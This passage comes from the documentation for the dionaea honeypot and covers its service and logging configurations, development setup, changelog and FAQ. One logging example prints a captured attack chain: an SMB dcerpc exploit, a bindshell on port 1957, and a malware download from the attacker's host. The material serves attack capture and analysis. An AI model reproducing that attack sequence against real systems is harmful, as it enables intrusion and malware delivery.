1126                  dcerpcservice_name,
1127                  dcerpcrequest_opnum
1128          FROM
1129                  dcerpcrequests
1130                  JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1131                  LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1132          WHERE
1133                  dcerpcserviceop_name IS NULL
1134          GROUP BY
1135                  dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1136          ORDER BY
1137                  COUNT(*) DESC;
1138
1139       to identify potential usefull targets of unknown dcerpc calls using the
1140       data you gathered and stored in your logsql database. Patches  are  ap‐
1141       preciated.
1142
1143   Example config
1144       services/smb.yaml
1145
1146          - name: smb
1147            config:
1148
1149              ## Generic setting ##
1150
1151              # 1:"Windows XP Service Pack 0/1",
1152              # 2:"Windows XP Service Pack 2",
1153              # 3:"Windows XP Service Pack 3",
1154              # 4:"Windows 7 Service Pack 1",
1155              # 5:"Linux Samba 4.3.11"
1156          #    os_type: 2
1157
1158               # Additional config
1159          #    primary_domain: Test
1160          #    oem_domain_name: Test
1161          #    server_name: TEST-SERVER
1162
1163               ## Windows 7 ##
1164          #    native_os: Windows 7 Professional 7600
1165          #    native_lan_manager: Windows 7 Professional 6.1
1166          #    shares:
1167          #      ADMIN$:
1168          #        comment: Remote Admin
1169          #        path: C:\\Windows
1170          #        type: disktree
1171          #      C$:
1172          #        coment: Default Share
1173          #        path: C:\\
1174          #        type:
1175          #          - disktree
1176          #          - special
1177          #      IPC$:
1178          #        comment: Remote IPC
1179          #        type: ipc
1180          #      Printer:
1181          #        comment: Microsoft XPS Document Writer
1182          #        type: printq
1183
1184               ## Samba ##
1185          #    native_os: Windows 6.1
1186          #    native_lan_manager: Samba 4.3.11
1187          #    shares:
1188          #      admin:
1189          #        comment: Remote Admin
1190          #        path: \\home\\admin
1191          #        type: disktree
1192          #      share:
1193          #        coment: Default Share
1194          #        path: \\share
1195          #        type: disktree
1196          #      IPC$:
1197          #        comment: Remote IPC
1198          #        path: IPC Service
1199          #        type: ipc
1200          #      Printer:
1201          #        comment: Printer Drivers
1202          #        type: printq
1203
1204
1205   TFTP
1206       Written to test the udp connection code, dionaea provides a tftp server
1207       on port 69, which can serve files. Even though there were  vulnerabili‐
1208       ties  in tftp services, I’m yet to see an automated attack on tftp ser‐
1209       vices.
1210
1211   Example config
1212       services/tftp.yaml
1213
1214          - name: tftp
1215            config:
1216              root: /var/lib/dionaea/roots/tftp
1217
1218
1219   UPnP
1220   Example config
1221       services/upnp.yaml
1222
1223          - name: upnp
1224            config:
1225              root: /var/lib/dionaea/roots/upnp
1226              # maximum size in kbytes of the request (32MB)
1227              max_request_size: 32768
1228              personality:
1229                # default
1230                cache:    "CACHE-CONTROL: max-age=120\r\n"
1231                st:       "ST: upnp:rootdevice\r\n"
1232                usn:      "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1233                server:   "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1234                location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1235                opt:      "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1236          #      # Samsung TV
1237          #      cache:     "CACHE-CONTROL: max-age=900\r\n"
1238          #      st:        "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1239          #      usn:       "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1240          #      server:    "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1241          #      location:  "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1242          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1243          #
1244          #      # XBOX 360
1245          #      cache:     "CACHE-CONTROL: max-age=1800\r\n"
1246          #      st:        "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1247          #      usn:       "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1248          #      server:    "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1249          #      location:  "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1250          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1251
1252

LOGGING (IHANDLER)

1254       Getting a copy of the malware is cool, getting an overview of  the  at‐
1255       tacks run on your sensor is priceless.
1256
1257       dionaea  can  write  information to a text file, but be aware, dionaeas
1258       logging to text files is rather chatty, really chatty, and you  do  not
1259       want  to look at the information, if you are not debugging the software
1260       or writing some new feature for it.
1261
1262       Of course, you can appy filters to the logging, to limit it to  differ‐
1263       ent  facilities  or levels, but in general you do not want to work with
1264       text files.
1265
1266       dionaea uses some internal communication system which is  called  inci‐
1267       dents.  An incident has an origin, which is a string, a path, and prop‐
1268       erties, which can be integers, strings, or a pointer to  a  connection.
1269       Incidents limit to the max, they pass the information required to inci‐
1270       dent handlers (ihandler).  An ihandler can register a  path  for  inci‐
1271       dents  he wants to get informed about, the pathes are matched in a glob
1272       like fashion.  Therefore logging information using an ihandler is supe‐
1273       rior  to text logging, you get the information you are looking for, and
1274       can write it to a format you choose yourself.
1275
1276       List of available ihandlers
1277
1278   emuprofile
1279   Example config
1280       ihandlers/emuprofile.yaml
1281
1282          - name: emuprofile
1283
1284
1285   fail2ban
1286   Example config
1287       ihandlers/fail2ban.yaml
1288
1289          - name: fail2ban
1290            config:
1291              downloads: "/var/lib/dionaea/downloads.f2b"
1292              offers: "/var/lib/dionaea/offers.f2b"
1293
1294
1295   ftp
1296   Example config
1297       ihandlers/ftp.yaml
1298
1299          # ftp client section
1300          - name: ftp
1301            config:
1302              # host for active ftp via NAT
1303              # * 0.0.0.0 - the initiating connection ip is used for active ftp
1304              # * not 0.0.0.0 - gets resolved as hostname and used
1305              active_host: "0.0.0.0"
1306
1307              # ports for active ftp; string indicating a range
1308              active_ports: 63001-64000
1309
1310
1311   hpfeeds
1312   Example config
1313       ihandlers/hpfeeds.yaml
1314
1315          - name: hpfeeds
1316            config:
1317              server: "hpfriends.honeycloud.net"
1318              port: 10000
1319              ident: ""
1320              secret: ""
1321              # dynip_resolve: enable to lookup the sensor ip through a webservice
1322              dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1323
1324
1325   log_db_sql
1326       WARNING:
1327          This ihanlder is experimental.
1328
1329       This incident handler can write interesting information  about  attacks
1330       and  connections  into  an SQL database.  It uses SQLAlchemy to support
1331       different databases.
1332
1333   Example config
1334       ihandlers/log_db_sql.yaml
1335
1336          - name: log_db_sql
1337            config:
1338              url: sqlite:////var/lib/dionaea/dionaea.db
1339
1340
1341   log_incident
1342       This ihandler can be used to export incidents in realtime  to  be  pro‐
1343       cessed by external programs.
1344
1345       WARNING:
1346          This  ihandler  is in pre alpha state and it might be changed or re‐
1347          moved in the future.
1348
1349   Configure
1350       handlers
1351          List of URLs to submit the information to.  At the moment only file,
1352          http and https are supported.
1353
1354   Format
1355          {
1356             "name": "<sensor-name>",
1357             "origin": "<name of the incident>",
1358             "timestamp": "<date in ISO 8601>",
1359             "data": {
1360                "connection": {
1361                   "id": <internal ID>,
1362                   "local_ip": "<local IP>",
1363                   "local_port": <local port>,
1364                   "remote_ip": "<remote IP>",
1365                   "remote_hostname": "<remote hostname if resolvable>",
1366                   "remote_port": <remote port>,
1367                   "protocol": "<protocol>",
1368                   "transport": "<transport tcp|udp>"
1369                }
1370             }
1371          }
1372
1373   Example config
1374       ihandlers/log_incident.yaml
1375
1376          - name: log_incident
1377            config:
1378              handlers:
1379                #- http://127.0.0.1:8080/
1380                - file:///var/lib/dionaea/dionaea_incident.json
1381
1382
1383   log_json
1384       This  ihandler can submit information about attacks/connections encoded
1385       as json.
1386
1387       WARNING:
1388          This ihandler is in pre alpha state and it might be changed  or  re‐
1389          moved in the near future.
1390
1391   Configure
1392       flat_data
1393          Set to true to flatten object lists.
1394
1395       handlers
1396          List of URLs to submit the information to.  At the moment only file,
1397          http and https are supported.
1398
1399   Format
1400       Format of the connection information:
1401
1402          {
1403              "connection": {
1404                  "local": {
1405                      "address": "<string:local ip address>",
1406                      "port": <integer:local port>,
1407                  },
1408                  "protocol": "<string:service name e.g. httpd>",
1409                  "remote": {
1410                      "address": "<string:remote ip address>",
1411                      "port": <integer:remote port>,
1412                      "hostname": "<string:hostname of the remote host>"
1413                  },
1414                  "transport": "<string:transport protocol e.g. tcp or udp>",
1415                  "type": "<string:connection type e.g. accepted, listen, ...>"
1416              }
1417          }
1418
1419   Example config
1420       ihandlers/log_json.yaml
1421
1422          - name: log_json
1423            config:
1424              # Uncomment next line to flatten object lists to work with ELK
1425              # flat_data: true
1426              handlers:
1427                #- http://127.0.0.1:8080/
1428                - file:///var/lib/dionaea/dionaea.json
1429
1430
1431   log_sqlite
1432       WARNING:
1433          This  ihandler  was  renamed  in  dionaea  0.4.0  from   logsql   to
1434          log_sqlite.
1435
1436       This  is  what  the  logsql  python script does, it is an ihandler, and
1437       writes interesting incidents to a sqlite database, one of the  benefits
1438       of  this  logging is the ability to cluster incidents based on the ini‐
1439       tial attack when retrieving the data from the database:
1440
1441          connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1442           dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1443           p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1444           profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1445                      ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1446           service: bindshell://1957
1447           connection 611 remoteshell tcp listen 10.69.53.52:1957
1448             connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1449               p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1450               offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1451               download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1452               connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1453                 connection 614 ftpdata tcp listen 10.69.53.52:62087
1454                   connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1455                     p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1456
1457       Additionally, you can query the database for many different things, re‐
1458       fer to:
1459
1460dionaea sql logging 2009/11/06
1461
1462post it yourself 2009/12/08
1463
1464sqlite performance 2009/12/12
1465
1466virustotal fun 2009/12/14
1467
1468Andrew Waite’s Blog for mimic-nepstats.py
1469
1470       for more examples how to make use of the database.
1471
1472   Example config
1473       ihandlers/log_sqlite.yaml
1474
1475          - name: log_sqlite
1476            config:
1477              file: /var/lib/dionaea/dionaea.sqlite
1478
1479
1480
1481   nfq
1482   Example config
1483       ihandlers/nfq.yaml
1484
1485          - name: nfq
1486            # nfq can intercept incoming tcp connections during the tcp handshake
1487            # giving your honeypot the possibility to provide service on
1488            # ports which are not served by default.
1489            # refer to the documentation BEFORE using this
1490            config:
1491              # 0 = DROP
1492              nfaction: 0
1493              throttle:
1494                window : 30
1495                limits:
1496                  total: 30
1497                  slot: 30
1498              timeouts:
1499                server:
1500                    listen: 5
1501                client:
1502                  idle: 10
1503                  sustain: 240
1504
1505
1506   p0f
1507   Example config
1508       ihandlers/p0f.yaml
1509
1510          - name: p0f
1511            config:
1512              # start p0f with
1513              # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1514              path: "un:///tmp/p0f.sock"
1515
1516
1517   store
1518   Example config
1519       ihandlers/store.yaml
1520
1521          - name: store
1522
1523
1524   submit_http
1525   Example config
1526       ihandlers/submit_http.yaml
1527
1528          - name: submit_http
1529            config:
1530                # the url to send the submission requests to
1531                url: "http://example.org/"
1532                # E-Mail (optional)
1533                # email: ""
1534                # username (optional)
1535                # user:
1536                # password (optional)
1537                # pass:
1538
1539
1540   submit_http_post
1541   Example config
1542       ihandlers/submit_http_post.yaml
1543
1544          - name: submit_http_post
1545            config:
1546              submit:
1547                file_upload:
1548                  urls:
1549                    - http://example.org/upload
1550                    - http://example.com/file.php
1551                  field_values:
1552                    submit: "Upload file"
1553                  file_fieldname: upload_file
1554
1555
1556   tftp_download
1557   Example config
1558       ihandlers/tftp_download.yaml
1559
1560          - name: tftp_download
1561
1562
1563   VirusTotal
1564       This  ihandler  submits  the captured malware samples to the VirusTotal
1565       service for further analysis.
1566
1567   Configuration
1568       apikey
1569          The VirusTotal API-Key.
1570
1571       file
1572          SQLite database file used to cache the results.
1573
1574   Example config
1575       ihandlers/virustotal.yaml
1576
1577          - name: virustotal
1578            config:
1579              # grab it from your virustotal account at My account -> Inbox -> Public API
1580              apikey: "........."
1581              file: "/var/lib/dionaea/vtcache.sqlite"
1582
1583

PROCESSORS

1585       Processors control the actions done on the  bi-directional  streams  we
1586       gain when getting attacked, the default is running the emu processor on
1587       them to detect shellcode.
1588
1589   Emu
1590       Use libemu to find and emulate shellcodes.
1591
1592   Configuration
1593   Filter
1594       Only continue with the processing pipeline if all conditions match.
1595
1596   Configuration
1597       protocols
1598          Comma separated list of connection types.
1599
1600       types
1601          Comma separated list of connection types.
1602
1603          • accept - dionaea accepts a new connection from a remote host
1604
1605          • connect - dionaea makes a connection to a remote host
1606
1607   Streamdumper
1608       This processor can dump a connection  as  bi-directional  stream.   The
1609       dump  can  be used to replay an attack on ip-level without messing with
1610       pcap and tcpreplay.
1611
1612   Configuration
1613       path
1614          Dumps will be created in this directory.
1615

CONTRIBUTING

1617       First of all, thank you for your interest in contributing to dionaea!
1618
1619   Filing bug reports
1620       Bug reports are very welcome.  Please file them  on  the  GitHub  issue
1621       tracker.   Good bug reports come with extensive descriptions of the er‐
1622       ror and how to reproduce it.
1623
1624   Patches
1625       All patches to dionaea should be submitted in the form of pull requests
1626       to the main dionaea repository, DinoTools/dionaea.  These pull requests
1627       should satisfy the following properties:
1628
1629   Code
1630       • The pull request should focus on one particular improvement to  dion‐
1631         aea.
1632
1633       • Create different pull requests for unrelated features or bugfixes.
1634
1635       • Python  code  should  follow  PEP  8, especially in the “do what code
1636         around you does” sense.
1637
1638   Documentation
1639       When introducing new functionality, please remember to write documenta‐
1640       tion.
1641
1642   Review
1643       Finally,  pull  requests must be reviewed before merging.  Everyone can
1644       perform reviews; this is a very valuable  way  to  contribute,  and  is
1645       highly encouraged.
1646

DEVELOPMENT

1648       dionaea  initial development was funded by the Honeynet Project as part
1649       of the Honeynets Summer of Code during 2009.  The  development  process
1650       is  as  open  as possible.  You can browse the source online and report
1651       bugs on GitHub
1652
1653   Development
1654   Vagrant
1655       Vagrant can be used to setup  a  development  environment  for  dionaea
1656       within minutes.
1657
1658   Install
1659       First install Vagrant and VirtualBox.
1660
1661       If everything has been setup correctly clone the git repository and use
1662       vagrant to bootstrap and start the environment.
1663
1664          $ git clone https://github.com/DinoTools/dionaea.git
1665          $ cd dionaea/vagrant
1666          $ vagrant up
1667
1668       All files will be installed in the /opt/dionaea directory.
1669
1670   Run
1671       Access the development environment, edit the  config  files  and  start
1672       dionaea with the following command.
1673
1674          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1675
1676   Rebuild and test
1677       To rebuild and install dionaea run the flowing commands.
1678
1679          $ cd /vagrant
1680          $ make
1681          $ sudo make install
1682
1683       See Run for more information on how to start dionaea.
1684
1685   Ubuntu 14.04
1686       Instead  of  using  Vagrant  you can use a Ubuntu 14.04 system to setup
1687       your development environment.  In this section we will use the  scripts
1688       used  to setup the Vagrant environment to bootstrap a fresh Ubuntu sys‐
1689       tem.  If you like you can  follow  the  ../installation  ‘From  Source’
1690       guide to setup everything by hand.
1691
1692   Install
1693       First install Ubuntu.
1694
1695       If everything has been setup correctly clone the git repository and run
1696       the bootstrap script.
1697
1698          $ git clone https://github.com/DinoTools/dionaea.git
1699          $ vagrant
1700          $ ./bootstrap.sh
1701
1702       All files will be installed in the /opt/dionaea directory.
1703
1704   Rebuild and test
1705       Rebuild, install and start dionaea from the root of the git repository.
1706
1707          $ make
1708          $ sudo make install
1709          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711       This can also be done in one line.
1712
1713          $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1714
1715   Find memory leaks
1716       To enable AddressSanitizer you have to add the following parameters  to
1717       the configure script and rebuild dionaea.
1718
1719          --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1720
1721       When  running  dionaea  it will print information about overfow errors.
1722       If you would like to stop execution you have to  export  an  additional
1723       environment variable.
1724
1725          export ASAN_OPTIONS='abort_on_error=1'
1726
1727       To  get  a  stacktrace you can use gdb and add an additional breakpoint
1728       break __asan_report_error.
1729
1730       It is also possible to use asan_symbolize.py python2 script to  extract
1731       additional information.
1732
1733          /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg  2>&1 | python asan_symbolize.py
1734
1735   Logging
1736       Logging should be used to report errors and for debugging purposes.  It
1737       must not be used to report attacks.  Incidents should be used for  this
1738       purpose.  For more information have a look at the ihandler section.
1739
1740       Comparison glib2 and Python
1741
1742                                ┌─────────┬──────────┐
1743                                │glib2    │ Python   │
1744                                ├─────────┼──────────┤
1745                                │debug    │ debug    │
1746                                ├─────────┼──────────┤
1747                                │info     │ info     │
1748                                ├─────────┼──────────┤
1749                                │warning  │ warning  │
1750                                ├─────────┼──────────┤
1751                                │critical │ error    │
1752                                ├─────────┼──────────┤
1753                                │error    │ critical │
1754                                └─────────┴──────────┘
1755
1756       WARNING:
1757          In  glib2 a critical message means critical warning. But in Python a
1758          critical message is handled as critical error.
1759
1760       WARNING:
1761          An error message in glib2 or a critical message in a  Python  module
1762          will terminate the program immediately.
1763
1764   Incident
1765       Some of the incidents reported by the dionaea core are listed below.
1766
1767       dionaea.connection.tcp.accept:
1768          A new TCP connection has been accepted by dionaea.
1769
1770       dionaea.connection.tls.accept:
1771          A new SSL/TLS connection has been accepted by dionaea.
1772
1773       dionaea.connection.tcp.connect:
1774          Reporte after dionaea has connection to an external service via TCP.
1775
1776       dionaea.connection.tls.connect:
1777          Reporte  after  dionaea  has  connection  to an external service via
1778          SSL/TLS.
1779
1780       dionaea.connection.udp.connect:
1781          Reporte after dionaea has connection to an external service via UDP.
1782
1783       dionaea.connection.free:
1784          A connection has been closed and freed.
1785
1786       dionaea.connection.tcp.listen:
1787          Fired after a TCP service has been bound and is listening for incom‐
1788          ming connections.
1789
1790       dionaea.connection.tls.listen:
1791          Fired  after  a  SSL/TLS service has been bound and is listening for
1792          incomming connections.
1793
1794       dionaea.connection.tcp.pending:
1795
1796       dionaea.connection.tcp.reject:
1797          A incoming connection has been rejected by the server.
1798
1799       dionaea.connection.link.early:
1800
1801       dionaea.connection.link:
1802          Reported to give the log management the chance to link  two  connec‐
1803          tions.
1804

CHANGELOG

1806   0.8.0 - (master)
1807   0.7.0 - (2018-05-01)
1808       build
1809
1810       • Add initial cmake support
1811
1812       ci
1813
1814       • Add Debian 9
1815
1816       dionaea
1817
1818       • Fix build error with OpenSSL 1.1.0
1819
1820       • Improve OpenSSL 1.1.0 support
1821
1822       • Cleanup connection code
1823
1824       • Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1825
1826       • Fixing chroot bugs (Thanks Michal Ambroz)
1827
1828       doc
1829
1830       • Add additional information
1831
1832       • Doxygen config file for dionaea c core
1833
1834       • Ubuntu 16.04 install instructions
1835
1836       package
1837
1838       • Remove old and deprecated debian package config
1839
1840       python
1841
1842       • Fix typo in config key
1843
1844       • Fix hardcoded python path
1845
1846       • Fix compilation on CentOS7 (Thanks Michal Ambroz)
1847
1848       python/http
1849
1850       • Initial support to handle SOAP requests
1851
1852       python/log_incident
1853
1854       • Improve hash generator
1855
1856       • Fix bug if parent is unknown
1857
1858       • Remove IDs from list if processed
1859
1860       python/mongo
1861
1862       • Initial support to simulate a MongoDB server
1863
1864       python/pyev
1865
1866       • Update from 0.8 to 0.9 to support Python >= 3.6
1867
1868       python/smb
1869
1870       • Add support for WannaCry and SambaCry (Big thanks to gento)
1871
1872       • Add additional config options to change identity
1873
1874       python/util
1875
1876       • Find Download commands for Linux shell
1877
1878   0.6.0 - (2016-11-14)
1879       dionaea
1880
1881       • Fix build for musl lib
1882
1883       doc
1884
1885       • Fix install instructions
1886
1887       • Extend README.md
1888
1889       python/blackhole
1890
1891       • New service/Initial version
1892
1893       python/emu_scripts
1894
1895       • New handler to analyse downloaded scripts
1896
1897       • Detect VBScript and PowerShell
1898
1899       • Limit number of subdownloads
1900
1901       python/http
1902
1903       • Clean up
1904
1905       • Use state vars instead of strings
1906
1907       • Add template support * Jinja 2 template engine * nginx template
1908
1909       python/mysql
1910
1911       • Dump files from SELECT queries
1912
1913       • Extract URLs from functions
1914
1915       • Variable handler
1916
1917       • Support for selecting variables
1918
1919       python/p0f
1920
1921       • Fix decode error
1922
1923       python/pptp
1924
1925       • Fix error if config is empty
1926
1927   0.5.1 - 2016-09-05
1928       dionaea
1929
1930       • Don’t report ‘connection.free’ incident to early to prevent segmenta‐
1931         tion faults
1932
1933   0.5.0 - 2016-08-06
1934       dionaea
1935
1936       • Handle byte objects in incidents
1937
1938       • Bump required Python version from 3.2 to 3.4
1939
1940       python/http
1941
1942       • Detect Shellshock attacks
1943
1944       python/log_incident
1945
1946       • Initial support to export raw incident information
1947
1948       python/log_sqlite
1949
1950       • Log credentials from the ftp service
1951
1952       python/memcache
1953
1954       • Initial support for the memcached protocol
1955
1956       python/pptp
1957
1958       • Clean up
1959
1960       • Handle CallClearRequests packets
1961
1962       • Values for hostname, vendor name and firmware revision are  now  cus‐
1963         tomizable
1964
1965       python/util
1966
1967       • New function to detect shellshock attacks and report detected URLs
1968
1969   0.4.2 - 2016-07-02
1970       doc
1971
1972       • Add information about log levels for developers
1973
1974       python/*
1975
1976       • Replace all critical log messages with error messages
1977
1978       • Catch  exceptions  in  handle_io_in()  and handle_io_out() to improve
1979         stability
1980
1981       • Catch exceptions in incident handlers
1982
1983       python/sip
1984
1985       • Fix error while reading config values
1986
1987       python/upnp
1988
1989       • Fix errors in log messages
1990
1991       more
1992
1993       • Add templates to create issues and merge requests on github
1994
1995   0.4.1 - 2016-06-14
1996       core
1997
1998       • Initialize stdout logger earlier
1999
2000       • Log error,critical and warning by default
2001
2002       python/*
2003
2004       • In glib2 critical is a critical warning
2005
2006       • Add support for exceptions
2007
2008       • Check file path and show warnings
2009
2010       python/log_json
2011
2012       • Add support for flat object lists to work with ELK stack
2013
2014   0.4.0 - 2016-05-31
2015       core
2016
2017       • Replace lcfg with Key-value file parser from glib
2018
2019       ci
2020
2021       • Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2022
2023       doc
2024
2025       • Add initial documentation for missing modules
2026
2027       • Update documentation to reflact config changes
2028
2029       • Add processor documentation
2030
2031       python/*
2032
2033       • Replace lcfg with yaml configs
2034
2035       • Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2036
2037       • Rename incident handlers from logsql to log_sqlite
2038
2039       • Rename incident handlers from uniqdownload to submit_http_post
2040
2041       python/mysql
2042
2043       • Enable processor pipeline
2044
2045   0.3.0 - 2016-03-30
2046       core
2047
2048       • Code clean up (Thanks to Katarina)
2049
2050       • Vagrant based dev environment
2051
2052       • Customize ssl/tls parameters for autogenerated certificates
2053
2054       doc
2055
2056       • Initial version of sphinx based documentation
2057
2058       python/ftp
2059
2060       • Support to customize response messages
2061
2062       • Small fixes
2063
2064       python/hpfeeds
2065
2066       • Initial ihandler support (Thanks to rep)
2067
2068       python/http
2069
2070       • Customize HTTP response headers
2071
2072       • Return HTTP/1.1 instead of HTTP/1.0
2073
2074       python/log_json
2075
2076       • Initial ihandler support
2077
2078       python/mqtt
2079
2080       • Initial protocol support (Thanks to gento)
2081
2082       python/pptp
2083
2084       • Initial protocol support (Thanks to gento)
2085
2086       python/upnp
2087
2088       • Initial protocol support (Thanks to gento)
2089
2090   0.2.1 - 2014-07-16
2091       core
2092
2093       • Support for cython and cython3
2094
2095       • Fixes to build with glib 2.40
2096
2097       • Remove build warnings
2098
2099       • Support libnl >= 3.2.21
2100
2101       python/http
2102
2103       • Fix unlink() calls
2104
2105       python/virustotal
2106
2107       • virustotal API v2.0
2108
2109   0.2.0 - 2013-11-02
2110       Last commit by original authors.
2111
2112   0.1.0
2113       • Initial release.
2114

FAQ

2116       WARNING:
2117          The documentation is work in progress.
2118
2119   Build/Install
2120       I get gcc: command not found?
2121          install gcc..
2122
2123       How to uninstall it?
2124          rm -rf /opt/dionaea
2125
2126       I get binding.pyx:…: undeclared name  not  builtin:  bytes  during  the
2127       python modules build.
2128          Install a recent cython version
2129
2130       I get Python.h not found during compiling cython
2131          Install appropriate headers for your python interpreter
2132
2133       I  do  not  use  ubuntu/debian  and the instructions are useless for me
2134       therefore.
2135          I use debian/ubuntu, and therefore I can only  provide  instructions
2136          for debian/ubuntu, but you are free to send me a diff for your oper‐
2137          ating system
2138
2139       I use Redhat/Centos 5 and the installation is frustrating and a mess as
2140       nothing works.
2141          Thats  right, but I did not choose your operating system.  Here is a
2142          list of outdated or missing packages for your choosen  distribution:
2143          all.  Yes,  you’ll even have to install glib (you’ll have 2.10 where
2144          2.20 is required) from source.  Getting python3 compiled with a  re‐
2145          cent  sqlite3 version installed to /opt/dionaea requires editing the
2146          setup.py file (patch  <http://p.carnivore.it/KDIFWt>).   /I  experi‐
2147          enced  this  wonderful  operating system myself … You really have to
2148          love your distro to stick with it, even if it  ships  software  ver‐
2149          sions  your  grandma  saw released in her youth.  Centos is the best
2150          distro  to change distros.  No matter what you choose, it can’t get
2151          worse./
2152
2153       Unable to build.
2154
2155              ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2156              ==> default: cp:
2157              ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2158
2159              ==> default: libtool: Version mismatch error.  This is libtool 2.4.6 Debian-2.4.6-2, but the
2160              ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2161              ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2162              ==> default: libtool: and run autoconf again.
2163
2164          Try to clean your build environment.
2165
2166          WARNING:
2167              This will remove all ignored and untracked files from the direc‐
2168              tory.  Use –dry-run
2169
2170              git clean -xdf
2171
2172   Run
2173       I get OperationalError at unable  to  open  database  file  when  using
2174       logsqlite and it does not work at all
2175          Read the logsql instructions <#logsql>
2176
2177       I get a Segmentation Fault
2178          Read the segfault instructions <#segfault>
2179
2180       I logrotate, and after logrotate dionaea does not log anymore.
2181          Read the logrotate instructions <#logging>
2182
2183       p0f does not work.
2184          Make sure your have p0f 2.0.8 and dionaea does not listen on ::, p0f
2185          can’t deal with IPv6.
2186
2187       I’m facing a bug, it fails, and I can’t figure out why.
2188          Explain the problem, if I’m interested in the nature of the problem,
2189          as  it  does not sound like pebcak, I may ask for a shell/screen and
2190          have a look myself, and if it is worth it, you’ll even get a FAQ en‐
2191          try for some specialties of your OS.
2192
2193       Unable to bind to port after dropping privileges
2194          Dropping  privileges  and  binding  to ports lower than 1024 is only
2195          support on Linux systems.  If some of the optional  build  dependen‐
2196          cies  are  missing  dionaea might not be able to bind to these ports
2197          too.  After enabling all log levels it should display some log  mes‐
2198          sages like in the example below.
2199
2200              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2201              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2202              [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2203
2204          To  fix  this  issue you have to install the kernel headers for your
2205          kernel and rebuild dionaea.  If everything works as  it  should  you
2206          might  get  log  messages like in the example below.  You might have
2207          noticed that there is now a pchild section.  This means  dionaea  is
2208          using a child process with extended privileges to bind to the port.
2209
2210              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2211              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2212              [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2213              [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2214              [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2215

TIPS AND TRICKS

2217       WARNING:
2218          The documentation is work in progress.
2219
2220   Rotate bistream files
2221       Dionaea  does not have and may never will have a function/option to ro‐
2222       tate the bistream files.  But you can do this by using a cron job and a
2223       simple shell script.
2224
2225       Feel free to use and modify the script below.
2226
2227          #!/bin/bash
2228
2229          # Compress bistream files older than 2 days
2230          find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;
2231
2232          # Clear bistream logs from dionaea every week
2233          find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
2234          find /var/lib/dionaea/bistreams/* -type d -empty -delete
2235

SUPPORT

2237   Cui honorem, honorem
2238       Google:
2239          Google has supported 3 students to work on dionaea during GSoc 2009,
